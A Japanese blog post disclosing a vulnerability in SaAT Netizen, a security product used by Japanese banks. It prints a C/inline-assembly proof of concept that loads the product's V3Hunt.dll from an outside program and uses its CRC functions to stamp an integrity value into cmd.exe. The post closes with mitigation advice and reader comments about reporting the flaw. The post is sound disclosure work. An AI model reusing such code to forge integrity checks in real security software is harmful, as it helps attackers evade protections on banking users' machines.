2016年03月03日

日本の 都市・地方銀行で採用されている韓国製SaAT NetizenにSwiftKeyと同じ脆弱性

追加実験で、V3Hunt.dll で少し遊んでみることにしました。

以下実証プログラム
#include "stdafx.h"
#include <windows.h>

int main(int argc, char* argv[])
{
    char fileX[512];
    HINSTANCE hDll = LoadLibraryA("V3Hunt.dll");
    DWORD CRC = 0;
    DWORD CRCW = 0;
    DWORD result;
    FARPROC  V3Net_GetFileCRC = GetProcAddress(hDll,"V3Net_GetFileCRC");
    FARPROC  V3Net_CheckFileCRC = GetProcAddress(hDll,"V3Net_CheckFileCRC");
    FARPROC  V3Net_WriteFileCRC = GetProcAddress(hDll,"V3Net_WriteFileCRC");
    GetModuleFileNameA(0,fileX,512);
    while(fileX[lstrlenA(fileX)-1]!='\\' )fileX[lstrlenA(fileX)-1]=0;
// 今のフォルダにある CMD.EXE のフルパス取得
    lstrcatA(fileX,"cmd.exe");
    _asm{
        lea eax,CRC
        push eax
        lea eax,BYTE PTR fileX[0]
        push eax
        push 0
        call V3Net_GetFileCRC
        add esp,0xc
        mov result,eax
// CMD.EXEのV3CRCを取得

        lea eax,BYTE PTR fileX[0]
        push eax
        push 0
        push 0x444444 // CRC Test
        call V3Net_CheckFileCRC
        add esp,0xc
        mov result,eax
// CMD.EXEのV3CRCが 0x444444と一致するかチェック

        lea eax,BYTE PTR fileX[0]
        push eax
        push 0
        push DWORD PTR CRC
        call V3Net_CheckFileCRC
        add esp,0xc
        mov result,eax
// CMD.EXEのV3CRCが V3Net_GetFileCRCで取得したものと一致するかチェック

        lea eax,BYTE PTR fileX[0]
        push eax
        call V3Net_WriteFileCRC
        add esp,4
        mov result,eax
// CMD.EXEにV3CRCを埋め込む

        lea eax,CRCW
        push eax
        lea eax,BYTE PTR fileX[0]
        push eax
        push 0
        call V3Net_GetFileCRC
        add esp,0xc
        mov result,eax
// 埋め込んだ後のCMD.EXEにV3CRCを取得する

    }
    return 0;
}

V3Hunt.DLL がそのままサードパーティの実行ファイルでロードできちゃうの自体がやばいんですが
関数の説明行きます



本件について。

・脆弱性に対応中だが時間がかかる。
・利用者の不安を煽るため記事を取り下げてほしい。

という要望が来てるので、以下の対応をすることにしました

・経緯(この文章を見えるところに書く。
・詳細記事についてプライベートモードにし、修正後に記事を再度公開する。


システムの根底からの脆弱性なので対応にかなり時間がかかるのは予想できるんですが、
この脆弱性放置したまま、ユーザーに使わせるのは正直どうなのかなって思います。

・オフラインインストールのパッケージを作って、それを配布して、オンラインアップデートをしないようにさせる。
・オンラインアップデートの機能を暫定的に殺す。

とか、それなりに簡潔でしっかりした対応もできるはずなんですが、
銀行取引というクリティカルなジャンルを扱うにもかかわらず、それをせずに、こっそり修正してリリースってのは、
企業の本性が見えたような気がしてやな感じです。


SaAT Netizenを使っている場合は脆弱性対策として

・セキュリティソフトを必ず導入し、SaAT Netizen関連のアップデータ(MUpdate2.exe  など upの付く実行プログラム)のインターネットアクセスを遮断する。
・信頼できない Wifi ネットワークや Proxy /DNS は絶対使わない

が必要です

これより先はプライベートモードに設定されています。閲覧するには許可ユーザーでログインが必要です。



blackwingcat at 08:30│Comments(8)TrackBack(0) | トピックイットに投稿する | 韓国・中国製ソフト | Security

Twitter Feedback

トラックバックURL

この記事へのコメント

1. Posted by kikori   2016年03月04日 12:08
酷すぎて余り言うことがありませんね
劣化リバースエンジニアリングしてるだけのような気がしますが
気のせいですかね・・・・
2. Posted by batta   2016年03月04日 17:58
なんとか拡散する方法は無いでしょうか?
開発元もマスゴミも恐らく黙りでしょうし...
3. Posted by 黒翼猫   2016年03月04日 18:40
スラドやガジェ速などのニュースサイトにタレこみます?
『Simejiプライバシーロックの脆弱性を発見した黒翼猫氏、SaAT Netizenの脆弱性指摘』
とか(笑)
4. Posted by くまねこ   2016年03月04日 19:31
是非、タレこみをお願いします。
炎上するか否か、炎上内容によっては
何かを動かすきっかけになりそうですね。
LINEと違って導入を義務づけたり、推奨する
銀行に揺さぶりが掛かる事を期待してます。
5. Posted by kikori   2016年03月04日 20:59
脆弱性報告する窓口としては
IPAやJPCERT/CCがありますけど
ソフトの知名度の低さから
まともに取り合ってくれるかどうか・・・
以前フリーウェアでも脆弱性報告されて
修正された事ありましたから
取り合わない事は無いとは思いますが
報告するのが何分面倒という・・・
6. Posted by miri_junk   2016年03月05日 09:56
 銀行は言葉の通じない下朝鮮企業とは直接契約ではないでしょう。代理店が切り替えないかぎり進展は無いのでしょうが、IBMだと独禁に触れそうなので第3者が経産省か総務省を経由して紹介を受けたほうが無難だと思います。まだ未導入の地銀とかあるし。北陸銀行等々。
 で、サートネチズンを排除するにしてもサートネチズン黙認の候補3社で存在すれば、パワーバランスで劣化が排除されるでしょうしそういう排除なら健全なのだと思います。
7. Posted by 通りすがりのよっしー   2016年03月06日 07:22
あれ?このセキュリティソフトは以前にも同じ脆弱性でIPAから注意喚起されていませんか?

ttp://www.ipa.go.jp/security/vuln/documents/2005/JVN_AF02FB4B_nProtect.html
8. Posted by 黒翼猫   2016年03月06日 14:57
それは、同じ韓国の別メーカーに作らせてたソフトですね。
10年前にも同じセキュリティホールあったのに変わってないどころか、
管理者権限で実行できるようになって凶悪になってますね

この記事にコメントする

名前:
URL:
  情報を記憶: 評価: 顔   
 
 
 
livedoor プロフィール
My PC
SNOWSTORM(P5E3 Premium)
OS:Win2000AdvancedSv
CPU:Xeon(4Core) 2.83G
Memory:8G
VGA:NVIDIA GTX 780Ti
HDD:SSD(32G)
    +SATA(540G+180G)
Crystal SCR:244765
SNOWFOX2(W860CU)
CPU:Core i5-540M(2.53G)
OS:Win2000Pro
Memory:4G
VGA:Geforce GTX285M
HDD:SSD(160G)
Crystal SCR:176460
SNOWMOBILE3(CF-J10S)
CPU:Core i5-2410M(2.3G)
VGA:Intel HD Graphics
HDD:SSD(128G)
Windows2000
Memory:6G
Crystal SCR:133495
SNOWMOBILE(N10Jc/故障)
Windows2000/XP Home
Crystal SCR:38316
SNOWLEO(MA206J/A/休止)
OS:OSX 10.4 +
Windows2000Pro(Solo動作)
Crystal SCR:24061
Windows 2000の セキュリティ対策について
FFR yarai(脆弱性防御)
SymantecEndpointSecurity 11 MR7
Windows Defender
記事検索
訪問者数

    今週のアクセス数

    Win2000お勧め
    お勧め記事
    Twitter Client Mo-Footer
    .NET FrameworkのUninstall
    lolifox 0.3.8.x
    WindowsのシャットダウンTips
    Fox Launcher
    ウィルス感染を手動で見つける方法
    Unknown Hard Errorとサルベージ
    Dependency Walker 日本語化
    Ultra VNC 1.0.6/1.0.8 を日本語化
    IME補完計画
    BSoD(ブルースクリーン)特集
    デフラグ時の4つの心得
    不明なデバイス探し
    SETUPAPI/NTDLLBugFix
    DNSデボルブ用更新[KB957579]
    最新 update.sys!
    4Thread以上のCPU最適化
    Win2000マルチコアで最適化
    Windows 2000の通信速度改善1
    Windows 2000の通信速度改善2
    内蔵簡易FireWallを使う
    ワームに感染しないインストール
    Remote Desktop Client
    IME 辞書 Tips
    Win2000用セキュリティSOFT
    不要なファイルの削除
    Win2000カスタマイズ
    便利なキーボードショートカット
    6月末まで使える体験版セキュリティ

    非対応ハード動作編
    HTC NDIS Driver
    Intel HD Graphic Driver
    VMWare Player 3.1.x
    Conexant HD Audio Driver
    NVIDIA WHQL Driver
    Intel Chipset 最新 INF
    Sentelic Finger Pad Driver
    ATI Legacy Driver 10.2
    AMD Radeon Driver 8〜11
    ATI Ahci/Raid Driver
    Intel SATA AHCI Driver
    D21LC(eMobile)
    USB-WSIM
    UVC カメラ
    Logicool Webcam
    Logicool ゲームパッド
    XBOX360用コントローラー
    Logicool Mouse
    Microsoft IntelliPoint
    iPod Touch/iPhone Driver

    非対応アプリ動作編
    Flash Player 10.3
    Java 6 JRE
    Java 7.0 JRE
    ティルズウィーバー
    Natal Online
    コンチェルトゲートフォルテ
    シルクロードオンライン
    東方幻想麻雀
    IME2010 Installer
    Adobe Reader X for Win2000
    Baidu IME 2.x
    MMORPG ドルアーガーの塔
    Adobe Air for Windows 2000
    Baidu IME
    iTunes 10.x installer
    Evernote 4
    Janetter
    Second Life
    雀龍門
    Media Manager for PSP 2.5a
    .NET Framework 3.5SP1
    ATOK 月額版(2010/2011)
    Leaf 愛佳でいくの!!
    VistaのScreenSaver
    会計ソフト弥生シリーズ 10
    Vegas Movie Studio 9
    EyeBall Chat
    ・CanonPowerShot[Soft/DPP]
    Google SketchUp Pro 7
    dance mixer
    Lismo Port
    DivX
    SONY ScreenSaver
    mixi アプリ
    DivX v7.x
    ニコニコムービーメーカー(動画)
    RC-S330 PaSoRi
    Finale 2009
    ZoneAlarm 8.0
    ルナティア Online
    ストリートギアーズ
    xfy Blog Editor
    Photoshop Elements 7
    Premiere Elements 7
    PowerShell 1.0
    ai sp@ce
    電脳フィギュアARis
    VOCALOID2 ミク・リンレン
    Google Chrome/SRW Iron
    Media Player 10
    ・iTunes 7.6.2を使う方法
    QuickTime 7.5x/7.6x
    foobar2000 9.5.x/9.6.x
    RealPlayer11
    Safari3/4.0
    ShockwavePlayer10/11
    Windows Live Writer
    Live Messenger
    Veoh Web Player / Web TV
    Level-R

    追加機能・カスタマイズ編
    W2K Kernel32 改造計画【BM】
    W2K Update Rollup v2
    XNA/SlimDX
    CPU Core数リミット解除
    OutLook Express 6SP3
    MDAC 2.8 SP2
    GIF/PNGを使えるMSPAINT
    IE5でWindowsUpdate
    MSXML 4.0SP3
    DirectX9.0c(2010/Feb)+拡張
    MS09-062(Gdiplus.dll)更新
    Unicode 制御文字
    Internet Explorer6 Bonus Pack
    夏時間(DaylightSavingTime)
    レジストリバックアップを取る
    IME2007
    Windows Media Bonus Pack
    XPSファイルビューア
    Windows Defender
    文字化け対策(FontLink)
    Meirio(KB927489)
    msconfig
    圧縮フォルダ
    Windows Movie Maker
    IE5.01/5.5/6タブ化
    MediaTypeChanger(EISA構成)
    Win2000 SP4 Support Tool
    kill/tlist with Debugging Tools
    sc.exe with Resource kit
    reg.exe
    TaskTray 256色化
    ISO仮想CD/DVDドライバ
    IE6高速化とWSH 5.7/5.8
    MS Baseline Security Analyzer
    音声認識 API 5.1
    Text Service

    Win2000インストール編
    CF-J10S
    N10Jc
    ThinkPad X200(7454)
    Quad Core/X48/P5E3
    VAIO VGN Type S
    E6850搭載 サポートPC
    Let'snote CF-R6
    MacMini
    Dell LATITUDE D630
    Core i7 + X58 +ICH10R
    790FX + SB750
    Clevo W860CU
    最新コメント
    Categories
    アーカイブ
    Information
    Google広告




    Translate


    このサイトはIE5.x/IE6
    IE5.x Internet Explorer 6.x

    Firefox Firefox ブラウザ無料ダウンロード
    で最適化されています。
    Technorati
    Add to iGoogle
    Amazon GIFTでカンパ

    Donation